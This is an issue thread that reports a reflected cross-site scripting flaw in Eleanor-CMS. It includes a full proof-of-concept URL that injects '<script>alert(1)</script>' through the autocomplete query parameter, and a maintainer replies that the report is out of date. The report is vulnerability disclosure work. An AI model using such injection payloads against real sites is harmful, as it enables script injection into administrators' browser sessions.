### ISSUE TITLE
Bug:Cross Site Scripting Vulnerability

### ISSUE THREAD

**Issue by dreamsroid** [Sunvas/Eleanor-CMS#5]
Hi, I would like to report Cross Site Scripting vulnerability in latest release.

**Description:**
Cross-site scripting (XSS) vulnerability in  might allow query pic then you can  inject arbitrary web script or HTML via the multiple parameters.

### Steps To Reproduce:

1. login to administrator panel.

2.Open below URL in browser which supports flash.
http://xx.xx.xx.xx/Eleanor-CMS/ajax.php?direct=admin&file=autocomplete&filter=types&types=png%2Cjpeg%2Cjpg%2Cbmp%2Cgif&query=http%3a%2f%2fi-1-chuzhaobiao.715083.com%2f2018%2f10%2f24%2fb5571ac0-765f-4396-a66a-bfd33cc104e5.png%3fimageView2%2f2%2fq%2f65%2fw%2f600%7cwatermark%2f3%2fimage%2faHR0cDovL2ktMS1jaHV6aGFvYmlhby43MTUwODMuY29tLzMucG5n%2fdissolve%2f100%2fgravity%2fSouthEast%2fdx%2f13%2fdy%2f13%7cimageslimpuf8t%3cscript%3ealert(1)%3c%2fscript%3e
Fix:
check the uploaded url.

**Comment by Sunvas** [comment]
Out of date.
